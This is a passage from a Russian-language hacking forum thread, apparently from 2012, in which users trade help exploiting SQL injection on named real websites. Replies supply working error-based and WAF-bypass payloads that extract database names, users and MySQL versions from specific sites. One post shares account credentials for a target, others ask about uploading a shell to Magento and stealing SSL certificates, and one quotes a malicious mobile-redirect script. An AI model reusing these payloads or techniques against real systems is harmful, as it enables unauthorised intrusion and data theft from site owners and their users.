Старый 11.11.2012, 18:10   #2511
Abadd0N
 
Регистрация: 04.11.2011
Сообщений: 29
Репутация: 0
По умолчанию

m0Hze заюзай https://rdot.org/forum/showthread.php?t=1403
Flakt регаться не пробовал и заюзать userid в запросе?
PS нужно, чтобы йпшник уже был в базе, чтобы запись в базе апдейтилась т.к. запрос апдейта выглядит иначе и не требует инъекции в стороковое значение.
Цитата:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near \'192.162.102.224\'\' at line 1 SQL=UPDATE jos_fb_whoisonline SET time=\'1352649887\', what=\'Главная\', do= \'\', task= \'\', link= \'/index.php?option=com_fireboard&Itemid=56&func=show cat\\'+--+\', func= \'showcat\'+--+\'\n WHERE userid=0 AND userip=\'192.162.102.224\'
Abadd0N вне форума   Ответить с цитированием
Старый 12.11.2012, 04:44   #2512
opium
 
Аватар для opium
 
Регистрация: 10.09.2010
Сообщений: 37
Репутация: 0
По умолчанию

Цитата:
Сообщение от 12309 Посмотреть сообщение
попробуй его в x-forwarded-for запихнуть
в том-то и дело что не выходит. Я подумал, что как-то по другому может нужно?!
opium вне форума   Ответить с цитированием
Старый 12.11.2012, 16:30   #2513
spari
 
Регистрация: 10.09.2012
Сообщений: 46
Репутация: 24
По умолчанию

Цитата:
Сообщение от Flakt Посмотреть сообщение
Как вывести версию бд в этой скули?

_http://gribnoybiz.ru/component/option,com_fireboard/Itemid,56/func,showcat'/catid,3/

изменил url, не помогло

_http://gribnoybiz.ru/index.php?option=com_fireboard&Itemid=56&func=show cat'&catid=3
you cant use comma,so you cant use double query.
also,you cant use union since the injection point is in 'update' statement-
Код:
UPDATE jos_fb_whoisonline SET time=\'1352729881\', what=\'Главная\', do= \'\', task= \'\', link= \'/index.php?option=com_fireboard&Itemid=56&func=showcat&catid=3\', func= \'showcat[injection]\'\n WHERE userid=0 AND userip=\'127.0.0.1\'
and if its not enough,you have to deal with whitespace with string based injection.
so you can use some error based tricks,to get some info.
db-
Код:
func,showcat'*vv()or'1
1035: FUNCTION soyaagr_grib.vv does not exist
db - soyaagr_grib
user-
Код:
func,showcat'*(select(1)from(x.x))or'1
SELECT command denied to user \'soyaagr_polikom\'@\'localhost\' for table \'x\'
user - soyaagr_polikom@localhost
spari вне форума   Ответить с цитированием
Старый 14.11.2012, 12:50   #2514
n3m1s
 
Регистрация: 13.11.2012
Сообщений: 10
Репутация: 0
По умолчанию

Вопрос такой. Кто что-нибудь знает о подделке, воровстве SSL сертификатов? Подскажите статей, может быть даже книг.
n3m1s вне форума   Ответить с цитированием
Старый 16.11.2012, 11:03   #2515
wwwMedic
 
Регистрация: 13.09.2011
Сообщений: 27
Репутация: 10
По умолчанию

помогите обойти фильтр
Код:
_http://www.cliccalavoro.it/jobseekers/download_cv.php?id_cv=1055112'
требуется авторизация, логин и пасс
a72270@rmqkr.net:1q2w3e4r

фильтруется почти каждый чих, многие(все?) функции. ни concat(), ни substr(), ни mid() - ничего
игры с регистром, комментариями, POST и COOKIE не помогли

Последний раз редактировалось wwwMedic; 05.02.2013 в 19:45..
wwwMedic вне форума   Ответить с цитированием
Старый 16.11.2012, 13:34   #2516
spari
 
Регистрация: 10.09.2012
Сообщений: 46
Репутация: 24
По умолчанию

Цитата:
Сообщение от wwwMedic Посмотреть сообщение
помогите обойти фильтр
Код:
_http://www.cliccalavoro.it/jobseekers/download_cv.php?id_cv=1055112'
требуется авторизация, логин и пасс
a72270@rmqkr.net:1q2w3e4r

фильтруется почти каждый чих, многие(все?) функции. ни concat(), ни substr(), ни mid() - ничего
игры с регистром, комментариями, POST и COOKIE не помогли
you can do it with GET,regular waf bypass-
instead of
Код:
value value
you can do
Код:
value%23a%0Avalue
and the webserver read as
Код:
value#a
value
Код:
http://www.cliccalavoro.it/jobseekers/download_cv.php?id_cv=1055112 and extractvalue%23a%0A(1,concat%23a%0A(0x27,version%23a%0A()))
XPATH syntax error: ''5.5.15-log'
dont decode the %23 and %0A.
spari вне форума   Ответить с цитированием
Старый 16.11.2012, 18:07   #2517
aspi
 
Аватар для aspi
 
Регистрация: 19.09.2012
Сообщений: 26
Репутация: -4
По умолчанию

как залить шелл в magento?
aspi вне форума   Ответить с цитированием
Старый 18.11.2012, 09:14   #2518
Faaax
 
Аватар для Faaax
 
Регистрация: 03.04.2012
Сообщений: 94
Репутация: 6
По умолчанию

подскажите пожалуйста как тут раскрутить?
Код:
http://4x4typ.ru/market/section.php?id=1'
Faaax вне форума   Ответить с цитированием
Старый 18.11.2012, 09:24   #2519
Untitled
 
Аватар для Untitled
 
Регистрация: 24.06.2012
Сообщений: 131
Репутация: 30
По умолчанию

Там только первые два символа из id попадают в запрос.
Аккуратнее, кстати:
Цитата:
var ismobile = navigator.userAgent.match(/(acs)|(alav)|(alca)|(amoi)|(audi)|(aste)|(avan)|(b enq)|(bird)|(blac)|(blaz)|(brew)|(cell)|(cldc)|(cm d-)|(dang)|(doco)|(eric)|(hipt)|(inno)|(ipaq)|(java) |(jigs)|(kddi)|(keji)|(leno)|(lg-c)|(lg-d)|(lg-g)|(lge-)|(maui)|(maxo)|(midp)|(mits)|(mmef)|(mobi)|(mot-)|(moto)|(mwbp)|(nec-)|(newt)|(noki)|(opwv)|(palm)|(pana)|(pant)|(pdxg) |(phil)|(play)|(pluc)|(port)|(prox)|(qtek)|(qwap)| (sage)|(sams)|(sany)|(sch-)|(sec-)|(send)|(seri)|(sgh-)|(shar)|(sie-)|(siem)|(smal)|(smar)|(sony)|(sph-)|(symb)|(t-mo)|(teli)|(tim-)|(tosh)|(tsm-)|(upg1)|(upsi)|(vk-v)|(voda)|(w3cs)|(wap-)|(wapa)|(wapi)|(wapp)|(wapr)|(webc)|(winw)|(winw) |(xda)|(xda-)|(up.browser)|(up.link)|(windows.ce)|(iemobile)|( mini)|(mmp)|(symbian)|(midp)|(wap)|(phone)|(pocket )|(mobile)|(android)|(pda)|(PPC)|(Series60)|(Opera .Mini)|(ipad)|(iphone)/i);
if (ismobile) {
document.location.href = "http://mobi-go.in/l=32411e1f0f7e4c115c115d0f1c134a0a2e411a0c5634485e 4a440c031640134d6d48051f1b6e011b120f"
}

Последний раз редактировалось Untitled; 18.11.2012 в 09:31..
Untitled вне форума   Ответить с цитированием
Старый 18.11.2012, 13:45   #2520
Flakt
 
Аватар для Flakt
 
Регистрация: 18.02.2011
Сообщений: 90
Репутация: 0
По умолчанию

Цитата:
Сообщение от Faaax Посмотреть сообщение
подскажите пожалуйста как тут раскрутить?
Код:
http://4x4typ.ru/market/section.php?id=1'
Например, так:

_http://4x4typ.ru/links/index.php?order_by=&order_by_d=&name=99999999'/**/and/**/(select/**/1/**/from/**/(select/**/(count(*)),concat((select/**/version()/**/from/**/information_schema.tables/**/limit/**/0,1),0x00,floor(rand(0)*2))x/**/from/**/information_schema.tables/**/group/**/by(x))/**/a)/**/or/**/'
Flakt вне форума   Ответить с цитированием
Ответ

Опции темы Поиск в этой теме
Поиск в этой теме:

Расширенный поиск
Опции просмотра

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход



Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2020, Jelsoft Enterprises Ltd. Перевод: zCarot